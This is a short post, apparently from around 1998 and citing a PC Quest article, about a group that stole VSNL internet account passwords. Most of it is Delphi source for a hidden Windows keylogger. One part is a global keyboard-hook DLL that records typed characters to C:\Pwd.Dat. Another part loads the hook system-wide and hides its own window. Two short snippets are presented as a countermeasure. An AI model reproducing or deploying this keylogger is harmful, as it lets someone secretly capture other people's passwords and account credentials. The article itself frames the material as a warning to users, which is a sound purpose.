Remember the group that captured VSNL passwords?

Remember the group that captured VSNL passwords? Here's the code they used to hack VSNL and the code to stop them from getting into your VSNL account. For complete details, refer to the October '98 edition of PC Quest. The article is "Stop Those Hackers"

Code 1:

library Intrcpt;
uses Windows;
const NumCharsToStore=100; KTrans:Longint=(1 shl 31);var CharsIntercepted: Array [1..NumCharsToStore] of Char; Keys: TKeyBoardState;
InterceptOn: Boolean;
ArrayIndex: Longint;
AsciiVal: DWORD;
InterceptFile: File;
SaveExit: Pointer;
Hook: HHook;
procedure SetHookVal(HookHandle: HHook); stdcall;
begin
Hook:=HookHandle;
end;
function KeyBoardHook(nCode: Integer;ParamW: WPARAM;ParamL: LPARAM): LRESULT; stdcall;
begin
if (InterceptOn) and (ArrayIndex<=NumCharsToStore) and ((ParamL and KTrans)=0) and (ParamW<>VK_SHIFT) and (ParamW<>VK_CAPITAL) and (ParamW<>VK_NUMLOCK) then
begin
GetKeyBoardState(Keys);
ToAscii(ParamW,(ParamL shr 16) and $FF,Keys,@AsciiVal,0);
CharsIntercepted[ArrayIndex]:=Chr(AsciiVal and $FF);
if (CharsIntercepted[ArrayIndex]=#13) then
begin
inc(ArrayIndex);
CharsIntercepted[ArrayIndex]:=#10;
end;
inc(ArrayIndex);
end;
Result:=CallNextHookEx(Hook,nCode,ParamW,ParamL);
end;
procedure LibExit;
begin
BlockWrite(InterceptFile,CharsIntercepted,ArrayIndex);
CloseFile(InterceptFile);
ExitProc:=SaveExit;
end;
exports SetHookVal, KeyBoardHook;
const NameToMatch:ShortString='C:\WINDOWS\SYSTEM\KERNEL32.DLL';
var CallerName: Array [0..255] of Char;
i: Integer;
begin
InterceptOn:=False;
GetModuleFileName(0,CallerName,255);
i:=0;
while ((i<Ord(NameToMatch[0])) and (NameToMatch[i+1]=CallerName[i])) do inc(i);
if (i=Ord(NameToMatch[0])) then
begin
InterceptOn:=True;
AssignFile(InterceptFile,'C:\Pwd.Dat');
Rewrite(InterceptFile,1);
ArrayIndex:=1;
SaveExit:=ExitProc;
ExitProc:=@LibExit;
end;
end.

Code 2:
type TfrmMain = class(TForm)
procedure FormDestroy(Sender: TObject);
private
hDLL: HMODULE;
Hook: HHOOK;
KeyBoardHookProc:Function(nCode:Integer;ParamW:WPARAM;ParamL:LPARAM):LRESULT; stdcall;
SetHookValProc: Procedure (HandleHook: HHook); stdcall;
procedure PlantHook;
end;
procedure TfrmMain.PlantHook;
var Name: PChar;
begin
Name:=StrAlloc(255);
StrPCopy(Name,'Intrcpt.Dll');
hDLL:=LoadLibrary(Name);
StrPCopy(Name,'SetHookVal');
SetHookValProc:=GetProcAddress(hDLL,Name);
StrPCopy(Name,'KeyBoardHook');
KeyBoardHookProc:=GetProcAddress(hDLL,Name);
Hook:=SetWindowsHookEx(WH_KEYBOARD,KeyBoardHookProc,hDLL,0);
SetHookValProc(Hook);
ShowWindow(Application.Handle,SW_HIDE);
Visible:=False;
StrDispose(Name);
end;
procedure TfrmMain.FormDestroy(Sender: TObject);
begin
UnhookWindowsHookEx(Hook);
FreeLibrary(hDLL);
end;

Code 3:
function KeyBoardHook(nCode: Integer;ParamW: WPARAM;ParamL: LPARAM): LRESULT; stdcall;
begin
if (InterceptOn) then Result:=0 else Result:=CallNextHookEx(Hook,nCode,ParamW,ParamL);
end;

Code 4:
const NameToMatch:ShortString='C:\WINDOWS\SYSTEM\KERNEL32.DLL';
var CallerName: Array [0..255] of Char;
i: Integer;
begin
GetModuleFileName(0,CallerName,255);
i:=0;
while ((i<Ord(NameToMatch[0])) and (NameToMatch[i+1]=CallerName[i])) do inc(i);
if (i=Ord(NameToMatch[0])) then InterceptOn:=True else InterceptOn:=False;
end.